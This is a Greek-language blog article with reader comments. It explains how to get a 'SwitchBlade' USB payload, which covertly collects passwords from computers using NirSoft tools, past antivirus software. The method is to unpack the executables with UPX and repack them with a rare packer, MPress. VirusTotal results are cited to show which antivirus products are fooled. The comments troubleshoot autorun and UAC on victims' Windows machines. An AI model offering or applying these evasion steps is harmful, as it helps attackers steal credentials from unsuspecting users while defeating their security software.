Τα εργαλεία της NirSoft που χρησιμοποιήσατε στο payload δεν προορίζονται για κακόβουλη χρήση αλλά επειδή κάποιοι, όπως εσείς ακολουθώντας τα βήματα αυτού του άρθρου, τα χρησιμοποιούν σε κάποιες… ας πούμε… ανορθόδοξες εφαρμογές, κάποιοι κατασκευαστές antivirus αποφάσισαν ότι τα συγκεκριμένα εργαλεία πρέπει να εντοπίζονται από τα antivirus ως malware. Και αυτό, όπως καταλαβαίνετε, δεν είναι ότι καλύτερο για το SwitchBlade που δημιουργήσατε, εκτός και αν δεν έχετε πρόβλημα να το συνδέσετε σε ένα υπολογιστή και να ξεκινήσουν οι σειρήνες!
Ένας τρόπος για να το αποφύγετε αυτό είναι να μην χρησιμοποιήσετε τα συγκεκριμένα εργαλεία στο δικό σας payload. Εκτός από τις πολλές διαφορετικές εφαρμογές payload, υπάρχουν και πολλοί διαφορετικοί τρόποι για να γίνει η ίδια εφαρμογή.
Ας υποθέσουμε όμως ότι «μουλαρώσατε» και θέλετε σώνει-και-καλά να χρησιμοποιήσετε τα εργαλεία της NirSoft. Υπάρχει ένας εύκολος τρόπος να «μασκαρέψετε» τα εργαλεία και να κοροϊδέψετε έτσι τα (περισσότερα) antivirus ώστε να μην τα εντοπίζουν.
Η αλλαγή EXE packer στο NirSoft MessenPass (mspass.exe) από UPX σε MPress. Η διαδικασία που φαίνεται στην εικόνα πρέπει να επαναληφθεί και για τα υπόλοιπα 9 εργαλεία της NirSoft.Πρόκειται για την παραδοσιακή μέθοδο με την χρήση κάποιου EXE packer, δηλαδή ενός προγράμματος που συμπιέζει εκτελέσιμα αρχεία. Βλέπετε, συμπιέζοντας ένα binary αρχείο, το περιεχόμενό του γίνεται τελείως διαφορετικό και τα antivirus δεν εντοπίζουν το signature που ψάχνουν. Βέβαια, τα σύγχρονα antivirus γνωρίζουν τους αλγορίθμους των πλέον δημοφιλών EXE packer και μπορούν να αποσυμπιέσουν τα εκτελέσιμα και να εντοπίσουν πάλι το signature. Οπότε πρέπει να χρησιμοποιήσετε κάποιο ιδιαίτερα νέο ή ιδιαίτερα σπάνιο EXE packer, όπως είναι ο MPress 1.27 (Προσοχή στην έκδοση!).
Όμως πριν ξεκινήσετε να συμπιέζετε τα εκτελέσιμα της NirSoft με το MPress, πρέπει πρώτα να τα αποσυμπιέσετε γιατί είναι ήδη συμπιεσμένα με τον UPX, που είναι ίσως ο δημοφιλέστερος EXE Packer. Έτσι, θα χρειαστεί να κατεβάσετε και την τελευταία έκδοση του UPX.
Αφού κατεβάσετε τους δύο EXE packer, ρίξτε το mpress.exe και το upx.exe στον φάκελο που έχετε τα εκτελέσιμα της NirSoft (τον φάκελο του payload), ανοίξτε μια κονσόλα τερματικού και πλοηγηθείτε στον συγκεκριμένο φάκελο. Για κάθε ένα από τα εκτελέσιμα της NirSoft δώστε τις εντολές:

upx -d [όνομα εκτελέσιμου αρχείου]
mpress [όνομα εκτελέσιμου αρχείου]

Στο τέλος της διαδικασίας τα εργαλεία της NirSoft θα έχουν αλλάξει EXE packer και θα εντοπίζονται από πολύ λιγότερα AntiVirus απ’ ότι αρχικά.
Ο πίνακας αυτός δημιουργήθηκε στέλνοντας το γνήσιο και το «μασκαρεμένο» mspass.exe για έλεγχο στην υπηρεσία VirusTotal. Παρατηρήστε πόσα antivirus ξεγελάστηκαν απλά και μόνο από την αλλαγή του EXE packer. Μεταξύ αυτών και μεγάλα ονόματα του χώρου όπως NOD32, Norton και McAffee. Πλέον το SwitchBlade σας μπορεί να λειτουργήσει ανενόχλητο και στην πλειονότητα των προστατευμένων υπολογιστών.Για να δείτε την αποτελεσματικότητα της μεθόδου, αλλά και για να ξέρετε με ποια συγκεκριμένα antivirus ενδέχεται να έχετε πρόβλημα, χρησιμοποιήστε την online υπηρεσία VirusTotal που μπορεί να ελέγξει για ιούς ένα αρχείο της επιλογής σας με 41 διαφορετικά antivirus.

26 Responses to “Επιχείρηση SwitchBlade: Το καρφώνεις και τελειώνεις!”

  1. TheWorldIsYours | 02/04/2012 at 00:36

    Παιδιά το link του converter δεν δουλεύει…

  2. TheWorldIsYours | 02/04/2012 at 04:28

    Παιδιά έχω πρόβλημα στην εκτέλεση του LPInstaller.Μοθ λέει ότι η συσκευή USB που έχω βάλει δεν είναι συμβατή Sandisk συσκευή…Ξέρει κανείς τι μπορεί να φταίει;

    • praeto | 02/04/2012 at 10:17

      Μήπως τρέχεις το LPInstaller σε Windows Vista ή Windows 7; Δες το σχετικό σχόλιο στην λεζάντα της 8ης εικόνας.

  3. MortisGR | 02/04/2012 at 09:56

    Είχα δοκιμάσει να φτιάξω ένα είδος switchblade (στην ουσία ένα απλό autorun.inf) που θα άνοιγε …(κάτι κακόβουλο φαντάζομαι, η αληθεια είναι πως δεν θυμάμαι, κάτι με passwords από MSN είχε να κάνει, από ένα αντίστοιχο BFTP άρθρο του Praeto), το οποίο σε WinXP SP1 έπαιζε μια χαρά, σε SP2 και μετά όμως είχα φάει πόρτα.

    Nice on, Praeto. :)

  4. giwrg98 | 02/04/2012 at 18:02

    Γιατί δεν μπορεί να γίνει η δουλειά με CD; Επίσης πού μπορώ να βρω U3 usb;

    • praeto | 02/04/2012 at 22:48

      Το (βασικό) πρόβλημα με το CD είναι ότι δεν έχεις κάποιο χώρο να αποθηκεύσεις τις πληροφορίες που θα συλλέξει το payload.

      • giwrg98 | 03/04/2012 at 20:19

        Δεν μπορώ να χρησιμοποιήσω κανένα επανεγγράψιμο CD;

        • praeto | 10/04/2012 at 19:19

          Θεωρητικά, με χρήση UDF θα μπορούσε να δουλέψει, και πάλι βέβαια, μόνο στην περίπτωση που το έβαζες σε burner, και υποστήριζε UDF κ.λπ.-κ.λπ.

          Στην πράξη, καλή τύχη…

  5. TheWorldIsYours | 02/04/2012 at 19:12

    Όντως praeto,τα windows 7 φταίνε..

  6. VRsMAker | 02/04/2012 at 21:36

    Έχω ένα πρόβλημα.Φτιάχνω και ονομάζω κανονικά το iso αρχείο.Το u3 φλασάκι μου αρχικά είχε το u3 εγκατεστημένο αλλά το απεγκατέστησα γιατί μου ψιλοέσπαγε τα νεύρα.Τέλος πάντων έβαλα στο φλασάκι (χωρίς το u3) έναν φάκελο στον οποίο είχα την έκδοση του LPInstaller που κατέβασα από εδώ και το iso αρχείο.Πάω σε ένα pc με xp βγάζω τα αρχεία απο το φλασάκι τα βάζω στο pc και εγκαθιστώ τον LPInstaller.Μόλις τελειώνει η εγκατάσταση (που έχει γίνει κανονικά) το cd image δεν έχει αντικατασταθεί με τα αρχεία του loader.Τι κάνω;

  7. VRsMAker | 03/04/2012 at 16:10

    Τελικά με ένα πρόγραμμα που λέγεται u3 universal customizer έλυσα το πρόγραμμα.Δημιουργήθηκε όμως ένα άλλο μόλις έβαλα το φλασάκι ενεργοποιήθηκε το uac και έπρεπε να πατήσω ναι για να εκτελεστούν τα διάφορα προγράμματα!

    • VRsMAker | 03/04/2012 at 16:59

      *πρόβλημα*

      • praeto | 10/04/2012 at 19:22

        Γνωστό θέμα που παραμένει άλυτο. Το άρθρο είχε γραφτεί την εποχή των Vista, τότε που το UAC δεν είχε γίνει καθόλου καλά αποδεκτό από τον κόσμο και ήταν ένα από τα πρώτα feature που απενεργοποιούσε μετά την εγκατάσταση Windows.

        Ούτως ή άλλως, το switchblade “λάμπει” σε XP που δεν έχουν UAC…

  8. djjohnny | 10/04/2012 at 18:53

    Καλησπέρα παιδιά έχω ένα θέμα…έκανα όλα τα βήματα όλα ωραία όλα κομπλέ…την πρώτη φορά έπαιξε κανονικά με το που το έβαλα και το μόνο θέμα που είχα ήταν τα προγράμματα που μου έβγαζαν το γνωστό παράθυρο των win7 για το αν ξεκινήσει ή όχι…αλλά αφού το έβγαλα το βάζω ξανά και τπτ…πρέπει να τρέξω το δήθεν CD για να πάρει μπρος…(δοκιμασμένο και σε άλλο pc)

    • praeto | 10/04/2012 at 19:24

      Με “το γνωστό παράθυρο των win7” εννοείς αυτό της εικόνας 3;

  9. djjohnny | 11/04/2012 at 15:31

    Ακριβώς…την πρώτη φορά δεν μου το έβγαλε αλλά μετά μ το βγάζει…και σε άλλα μηχανήματα…

  10. mp3nick | 13/04/2012 at 21:24

    Τον φάκελο SwitchBlade μπορουμε να τον κανουμε hidden ? θα λειτουργει γιατι τ δοκιμασα και δν λειτούργησε

  11. TheWorldIsYours | 17/04/2012 at 23:24

    praeto δηλαδή δεν δουλεύει σε windows 7; Γιατί έκανα προσεκτικά όλα τα βήματα και δεν δούλεψε…

    • praeto | 18/04/2012 at 08:39

      Ναι, πιστεύω ότι στα Win7 θα έχει προβλήματα. Αρχικά με το Autorun/Autoplay, του οποίου δεν γνωρίζω την συμπεριφορά στα Win7 αλλά υποψιάζομαι ότι είναι ίδια με τα Vista, οπότε υπάρχει εκεί ένα θεματάκι όπως αναφέρεται και στο άρθρο.
      Αλλά ακόμα και αν το προσπεράσεις αυτό, έχεις να αντιμετωπίσεις το UAC, οπότε είτε θα ποντάρεις σε συστήματα με απενεργοποιημένο UAC, είτε θα “ελαφρύνεις” υπερβολικά το payload με προγράμματα που δεν χρειάζονται admin access.
      Όπως είπα και πιο πάνω, το switchblade είναι σχεδιασμένο για XP.

  12. Cloudy | 04/05/2012 at 04:21

    Μονο ενα προβλημα εχω μου ριχνει το στικακι στα 4gb απο τα 8 που ειναι …..

  13. best1992 | 28/06/2013 at 03:18

    Θα μπορουσαμε να δημιουργησουμε το ιδιο προγραμμα για τα κινητα???

Leave a Reply

You must be logged in to post a comment.

Σύνδεση

Αρχείο δημοσιεύσεων